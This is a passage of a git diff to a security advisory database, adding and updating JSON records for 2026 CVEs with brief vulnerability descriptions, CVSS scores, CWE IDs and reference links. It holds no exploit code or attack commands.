"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25429" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-openvpnadvanced" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json new file mode 100644 index 0000000000000..6624df5aeb400 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rf9x-x7wj-42rg/GHSA-rf9x-x7wj-42rg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rf9x-x7wj-42rg", + "modified": "2026-02-20T18:31:27Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25362" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FooPlugins FooGallery foogallery allows Stored XSS.This issue affects FooGallery: from n/a through <= 3.1.11.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25362" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/foogallery/vulnerability/wordpress-foogallery-plugin-3-1-11-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json b/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json new file mode 100644 index 0000000000000..5d1358d27bb9a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfh7-7v27-6p9r", + "modified": "2026-02-22T03:30:26Z", + "published": "2026-02-22T03:30:26Z", + "aliases": [ + "CVE-2026-2897" + ], + "details": "A security vulnerability has been detected in funadmin up to 7.1.0-rc4. This vulnerability affects unknown code of the file app/backend/view/index/index.html of the component Backend Interface. The manipulation of the argument Value leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2897" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/4" + }, + { + "type": "WEB", + "url": "https://github.com/I4m6da/CVE/issues/4#issue-3890421022" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347208" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347208" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753975" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T01:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfj2-v87v-5mg6/GHSA-rfj2-v87v-5mg6.json b/advisories/unreviewed/2026/02/GHSA-rfj2-v87v-5mg6/GHSA-rfj2-v87v-5mg6.json new file mode 100644 index 0000000000000..0689aaeccd3cd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfj2-v87v-5mg6/GHSA-rfj2-v87v-5mg6.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfj2-v87v-5mg6", + "modified": "2026-02-17T18:32:58Z", + "published": "2026-02-17T18:32:58Z", + "aliases": [ + "CVE-2026-2618" + ], + "details": "A vulnerability was determined in Beetel 777VR1 up to 01.00.09. This impacts an unknown function of the component SSH Service. This manipulation causes risky cryptographic algorithm. The attack is possible to be carried out remotely. The attack is considered to have high complexity. The exploitability is said to be difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2618" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/8e8e559f80e2d596cb6154747f69a081" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/8e8e559f80e2d596cb6154747f69a081#proof--steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346268" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346268" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751633" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T17:21:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json b/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json index d9605c163a3ba..1105520a4f7a7 100644 --- a/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json +++ b/advisories/unreviewed/2026/02/GHSA-rfjq-chwp-46m7/GHSA-rfjq-chwp-46m7.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rfjq-chwp-46m7", - "modified": "2026-02-05T12:30:26Z", + "modified": "2026-02-19T21:30:42Z", "published": "2026-02-05T12:30:26Z", "aliases": [ "CVE-2026-23796" ], "details": "Quick.Cart allows a user's session identifier to be set before authentication. The value of this session ID stays the same after authentication. This behaviour enables an attacker to fix a session ID\nfor a victim and later hijack the authenticated session.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.7 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json b/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json new file mode 100644 index 0000000000000..6e18ef924077c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfpg-r65c-g86m/GHSA-rfpg-r65c-g86m.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfpg-r65c-g86m", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69408" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes HealthFirst healthfirst allows PHP Local File Inclusion.This issue affects HealthFirst: from n/a through <= 1.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69408" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/healthfirst/vulnerability/wordpress-healthfirst-theme-1-0-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfq9-4wcm-64gh/GHSA-rfq9-4wcm-64gh.json b/advisories/unreviewed/2026/02/GHSA-rfq9-4wcm-64gh/GHSA-rfq9-4wcm-64gh.json deleted file mode 100644 index b99b74f1825aa..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-rfq9-4wcm-64gh/GHSA-rfq9-4wcm-64gh.json +++ /dev/null @@ -1,52 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-rfq9-4wcm-64gh", - "modified": "2026-02-14T06:30:58Z", - "published": "2026-02-14T06:30:58Z", - "aliases": [ - "CVE-2026-2469" - ], - "details": "Versions of the package directorytree/imapengine before 1.22.3 are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') via the id() function in ImapConnection.php due to improperly escaping user input before including it in IMAP ID commands. This allows attackers to read or delete victim's emails, terminate the victim's session or execute any valid IMAP command on victim's mailbox by including quote characters \" or CRLF sequences \\r\\n in the input.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2469" - }, - { - "type": "WEB", - "url": "https://github.com/DirectoryTree/ImapEngine/pull/150" - }, - { - "type": "WEB", - "url": "https://github.com/DirectoryTree/ImapEngine/commit/87fca56affd9527e6907a705e6d600c5174d9a5a" - }, - { - "type": "WEB", - "url": "https://gist.github.com/wanamirulhakim/74b41589cdea3c07c3375e5946960778" - }, - { - "type": "WEB", - "url": "https://security.snyk.io/vuln/SNYK-PHP-DIRECTORYTREEIMAPENGINE-15274300" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-74" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-14T05:16:22Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json new file mode 100644 index 0000000000000..1ce5960d7bf73 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg7x-c263-823c", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2495" + ], + "details": "The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2495" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama-api.php#L209" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama.php#L215" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3461315%40wpnakama&new=3461315%40wpnakama&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffa92be-9d38-40d9-954d-d890136b5aa1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json new file mode 100644 index 0000000000000..c577f818717f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgjw-pqcr-56gf", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-14340" + ], + "details": "Cross-site scripting in REST Management Interface in Payara Server <4.1.2.191.54, <5.83.0, <6.34.0, <7.2026.1 allows an attacker to mislead the administrator to change the admin password via URL Payload.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:X/RE:M/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14340" + }, + { + "type": "WEB", + "url": "https://docs.payara.fish/enterprise/docs/Security/Security%20Fix%20List.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json new file mode 100644 index 0000000000000..889d69c0fb852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgq3-q5rc-mjc3", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1906" + ], + "details": "The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.6.0 via the `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX action due to missing capability checks and order ownership validation. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify Peppol/EDI endpoint identifiers (`peppol_endpoint_id`, `peppol_endpoint_eas`) for any customer by specifying an arbitrary `order_id` parameter on systems using Peppol invoicing. This can affect order routing on the Peppol network and may result in payment disruptions and data leakage.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1906" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L72" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L895" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1922c6-e63b-47aa-97de-1e2382fa25d3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json b/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json new file mode 100644 index 0000000000000..8f013e4c3e9fe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rgxp-2hwp-jwgg/GHSA-rgxp-2hwp-jwgg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgxp-2hwp-jwgg", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2026-25087" + ], + "details": "Use After Free vulnerability in Apache Arrow C++.\n\nThis issue affects Apache Arrow C++ from 15.0.0 through 23.0.0. It can be triggered when reading an Arrow IPC file (but not an IPC stream) with pre-buffering enabled, if the IPC file contains data with variadic buffers (such as Binary View and String View data). Depending on the number of variadic buffers in a record batch column and on the temporal sequence of multi-threaded IO, a write to a dangling pointer could occur. The value (a `std::shared_ptr` object) that is written to the dangling pointer is not under direct control of the attacker.\n\nPre-buffering is disabled by default but can be enabled using a specific C++ API call (`RecordBatchFileReader::PreBufferMetadata`). The functionality is not exposed in language bindings (Python, Ruby, C GLib), so these bindings are not vulnerable.\n\nThe most likely consequence of this issue would be random crashes or memory corruption when reading specific kinds of IPC files. If the application allows ingesting IPC files from untrusted sources, this could plausibly be exploited for denial of service. Inducing more targeted kinds of misbehavior (such as confidential data extraction from the running process) depends on memory allocation and multi-threaded IO temporal patterns that are unlikely to be easily controlled by an attacker.\n\nAdvice for users of Arrow C++:\n\n1. check whether you enable pre-buffering on the IPC file reader (using `RecordBatchFileReader::PreBufferMetadata`)\n\n2. if so, either disable pre-buffering (which may have adverse performance consequences), or switch to Arrow 23.0.1 which is not vulnerable", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25087" + }, + { + "type": "WEB", + "url": "https://github.com/apache/arrow/pull/48925" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/mpm4ld1qony30tchfpjtk5b11tcyvmwh" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/17/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T14:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json b/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json new file mode 100644 index 0000000000000..01cfa74bf1647 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rhvr-p49q-rhmm/GHSA-rhvr-p49q-rhmm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhvr-p49q-rhmm", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22375" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Impacto Patronus impacto-patronus allows PHP Local File Inclusion.This issue affects Impacto Patronus: from n/a through <= 1.2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22375" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/impacto-patronus/vulnerability/wordpress-impacto-patronus-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json new file mode 100644 index 0000000000000..1d82bf0a60c65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj4g-w683-5gq4", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1925" + ], + "details": "The EmailKit – Email Customizer for WooCommerce & WP plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'update_template_data' function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the title of any post on the site, including posts, pages, and custom post types.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1925" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.2/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailKitAjax.php#L150" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3456972/emailkit/trunk?contextall=1&old=3419280&old_path=%2Femailkit%2Ftrunk#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f131ea1e-d652-4854-abea-6a307ca8118f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json b/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json new file mode 100644 index 0000000000000..e9212e5fdb578 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rjh6-2p75-696h/GHSA-rjh6-2p75-696h.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjh6-2p75-696h", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-56208" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in desertthemes NewsMash newsmash allows Stored XSS.This issue affects NewsMash: from n/a through <= 1.0.71.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56208" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/newsmash/vulnerability/wordpress-newsmash-theme-1-0-71-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json new file mode 100644 index 0000000000000..a0dc26782875f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjm5-gmfm-6cp4", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-2656" + ], + "details": "A flaw has been found in ChaiScript up to 6.1.0. This affects the function chaiscript::Type_Info::bare_equal of the file include/chaiscript/dispatchkit/type_info.hpp. This manipulation causes use after free. The attack requires local access. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2656" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/636#issue-3828333582" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346454" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json b/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json new file mode 100644 index 0000000000000..a150f302cc657 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm24-2x6v-8w7f", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-2622" + ], + "details": "A vulnerability was detected in Blossom up to 1.17.1. This vulnerability affects the function content of the file blossom-backend/backend/src/main/java/com/blossom/backend/server/article/draft/ArticleController.java of the component Article Title Handler. The manipulation results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": 